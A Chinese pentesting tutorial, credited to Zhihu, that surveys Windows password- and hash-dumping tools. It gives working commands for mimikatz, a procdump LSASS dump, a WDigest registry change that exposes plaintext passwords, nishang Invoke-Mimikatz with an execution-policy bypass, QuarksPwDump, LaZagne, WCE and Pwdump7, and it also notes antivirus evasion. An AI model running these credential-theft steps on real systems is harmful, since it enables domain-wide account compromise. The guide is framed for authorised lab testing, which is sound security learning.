window下抓取密碼總結

本文來自知乎： https://zhuanlan.zhihu.com/p/58875844

無論是在我們滲透測試過程中(授權的情況下)還是在自己搭建的環境中進行攻防演練，獲取服務器的明文密碼或這hash值這一步驟非常重要，如果抓取到的密碼是整個域內服務器的通用密碼，那我們就可以不費吹灰之力拿到整個域控內的所有服務器。現在抓取密碼的工具差不多都是exe、圖形化工具、python寫的工具等。

既然我們可以抓到主機的密碼，那麼相應的廠商也會做出相應的應對措施，比如系統爲win10或2012R2以上時，默認在內存緩存中禁止保存明文密碼，此時可以通過修改註冊表的方式抓取明文，但需要用戶重新登錄後才能成功抓取；殺毒軟件根據木馬的的特徵碼直接殺死抓取面的工具，這時我們需要編寫過殺毒軟件的代碼、修改註冊表等等。

滲透測試往往就是矛與盾的較量，是矛更厲害，還是盾防的到位，其實就是在一瞬間的事情，細節決定成敗，攻方需要了解防守方的策略；守護者需要明白攻方的套路。滲透測試路漫漫，唯獨知識來充實自己。

下面介紹一下幾款不錯的工具，話不多說，直接進入正題，下面的測試全是在自己搭建的環境中：

一、mimikatz_trunk工具抓取密碼

1、 mimikatz_trunk工具:

mimikatz這款工具是一個法國人寫的輕量級調試器。這款工具的牛逼之處就是可以直接從 lsass.exe 裏獵取windows處於active狀態賬號明文密碼，非常強大。mimikatz2.0以後的版本抓取密碼很簡單，只需要兩步就可以抓取密碼。

(1)、提升權限:privilege::debug

(2)、抓取主機密碼:

2、需要說明一下，當系統爲win10或2012R2以上時，默認在內存緩存中禁止保存明文密碼，此時可以通過修改註冊表的方式抓取明文，但需要用戶重新登錄後才能成功抓取。

(1)、抓取到的密碼爲空：

我們可以通過修改註冊表來繞過這個，需要用戶重新登錄後才能成功抓取。修改註冊表的命令:

reg add hklmSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)、我們運行完畢後，當用戶再次登錄服務器，我們重新加載mimikatz，就能獲取到用戶的密碼:

當我們不需要存儲明文密碼的時候，我們可以將上述命令中的REG_DWORD的值修改爲0即可。

3、我們還可以利用mimikatz在線導出sam的Hash：

分別執行命令:

log res.txt

privilege::debug

token::elevate

lsadump::sam

當我們獲取到hash值後，我們通過破解hash值來獲取明密碼，用hashcat直接跑，字典越大跑出來的幾率就越大；推薦一下在線破解hash值的網站：

www.objectif-securite.ch

Objectif Sécurité - Ophcrackwww.objectif-securite.ch

4、這款工具也可以配合Procdump進行抓取密碼：

首先我們先用procdum這款工具下載lsass進程的內存，這個工具一般不會被AV查殺的，這款工具也分爲32位和64位兩個版本：

(1)、執行下載lsass進程內存的命令>procdump64.exe -accepteula -ma lsass.exe ，執行完畢後，在當前目錄下會生成一個lsass---.dmp的文件，這個文件是我們需要的文件：

(2)、將這個文件放在mimikatz目錄下，然後啓動mimikatz.exe，執行sekurlsa::minidump lsass.exe_190310_001506.dmp:

(3)、執行讀取密碼的命令:sekurlsa::tspkg:

5、nishang抓取主機密碼：

Nishang是一款針對PowerShell的滲透工具，除了可以抓取密碼還可以進行端口掃描、提權、密碼爆破等功能，這款工具依賴系統權限（有點小瑕疵），今天只是說一下抓密碼的功能：

https://github.com/samratashok/nishang

Posershell既然是一個框架，那我們需要將nishang導入到這個框架當中，運行腳本需要一定的權限，powershell默認的執行策略是Restricted，這個Restricted是不允許運行任何腳本的。你在PowerShell執行Get-ExecutionPolicy命令來查看默認的策略組:

我們需要修改策略組，在PowerShell下執行Set-ExecutionPolicy remotesigned,將策略值改爲remotesigned,這樣我們就可以運行腳本:

首先需要下載的nishang，然後執行導入的操作，Import-Module .nishangnishang.psm1,首次導入會產生警告的提示，這樣我們不用去理會，再次執行導入命令就可以：

接下來我們試一下抓取用戶的hash值，執行Get-PassHashes，成功獲取用戶的hash值:

執行抓取用戶的明文密碼:

(1) powershell –exec bypass –Command "& {Import-Module'C:WindowsSystem32WindowsPowerShellv1.0nishangGatherInvoke-Mimikatz.ps1';Invoke-Mimikatz}"

三、Quarks PwDump抓取用戶密碼:

Quarks PwDump 是一款開放源代碼的Windows用戶憑據提取工具，它可以抓取windows平臺下多種類型的用戶憑據，包括：本地帳戶、域帳戶、緩存的域帳戶和Bitlocker。

(1)、QuarksPwDump.exe參數說明：

-dhl 導出本地哈希值

-dhdc導出內存中的域控哈希值

-dhd 導出域控哈希值，必須指定NTDS文件

-db 導出Bitlocker信息，必須指定NTDS文件

-nt 導出ntds文件

-hist 導出歷史信息，可選項

-t 導出類型可選默認導出爲John類型。

-o 導出文件到本地

(2)、執行抓取用戶密碼的命令quarksPwDump.exe --dump-hash-local -o hash.txt,我們將抓取到的本地用戶的密碼保存到本地目錄下的hash.txt中,保存的位置以及文件名自己可以設置:

四、LaZagne本地抓取計算機密碼:

LaZagne是一款用於檢索大量存儲在本地計算機密碼的開源應用程序。該工具通過python開發，易讀、易維護，依賴的python2版本,這款工具不僅能抓取胡勇密碼，還可以抓取瀏覽器中的緩存的密碼、SVN密碼、wifi密碼、郵箱密碼等功能，這款工具不經適用於windows，也可以適用於Linux、MAC,這裏只是演示一

下windows下抓取本地的用戶密碼:

先看一下這款工具的參數:

測試一下抓取本地用戶密碼:

執行命令:lazagne.exe windows,成功獲取到用戶密碼:

如果詳細瞭解這款工具，可以參考一下這篇文章，本小白覺得寫的還不錯，挺詳細的，附鏈接

http://link.zhihu.com/?target=https%3A//www.4hou.com/tools/7404.html

五、wce抓取密碼:

這款工具是一款Hash注入神器，不僅可以用於Hash注入，也可以直接獲取明文或Hash。這款工具也分爲32位和64位兩個不同的版本：

先來看一下這款工具的參數詳解：

參數解釋:

-l 列出登錄的會話和NTLM憑據（默認值）；

-s 修改當前登錄會話的NTLM憑據參數：<用戶名>:<域名>:<LM哈希>:<NT哈希>；

-r 不定期的列出登錄的會話和NTLM憑據，如果找到新的會話，那麼每5秒重新列出一次；

-c 用一個特殊的NTML憑據運行一個新的會話參數：<cmd>；

-e 不定期的列出登錄的會話和NTLM憑據，當產生一個登錄事件的時候重新列出一次；

-o 保存所有的輸出到一個文件參數:<文件名>；

-i 指定一個LUID代替使用當前登錄會話參數:<luid>。

-d 從登錄會話中刪除NTLM憑據參數:<luid>；

-a 使用地址參數: <地址>；

-f 強制使用安全模式

-g 生成LM和NT的哈希參數<密碼>

-f 強制使用安全模式；希參數<密碼>；（unix和windows wce格式）；；；

-k 從一個文件中讀取kerberos票據並插入到windows緩存中

-k 從一個文件中讀取kerberos票據並插入到windows緩存中；

-v 詳細輸出；

(2)、抓取用戶的明文密碼:

執行命令:Wce.exe -w

(3)、抓取hash值:

執行命令wce.exe -l

如果不想把抓取的密碼或者hash值顯示在dos界面上，也可以保存在txt文檔中，比如：wce.exe -w > hash.txt

六、Getpass工具

這款工具由閃電小子根據mimikatz編譯的一個工具，雙擊運行或者在cmd運行可以直接獲取明文密碼，有的時候需要自己做免殺處理。

七、Pwdump7工具

Pwdump 7是一個免費的Windows實用程序，它能夠提取出Windows系統中的口令，並存儲在指定的文件中。Pwdump7是Pwdump3e的改進版，該程序能夠從Windows目標中提取出NTLM和LanMan口令散列值，而不管是否啓用了Syskey（這是一個Windows賬戶數據庫加密工具，是Windows下的一條命令）。

這款工具使用比較方便，直接在dos命令中執行pwdump7.exe，就可以直接抓取密碼，如.不願意輸出到桌面，可以執行pwdump7.exe > hash.txt。

抓取到的hash值可以通過在線破解獲取明文密碼:

如果抓到的hash密碼在這個網站破解失敗後，可以把它放在MD5裏面進行破解也可以成功，只不過這個幾率有點小:

''''''''''

其實還有幾款工具還沒介紹，比如利用註冊表來離線讀取hsah、SqlDumper +配合mimikatz來讀取用戶密碼等工具。等小白把這幾款工具的使用方法總結完畢後，再和大家分享一下。重要的事情說三遍，測試是在本地搭建環境進行的，切勿非法使用；測試是在本地搭建環境進行的，切勿非法使用；測試是在本地搭建環境進行的，切勿非法使用。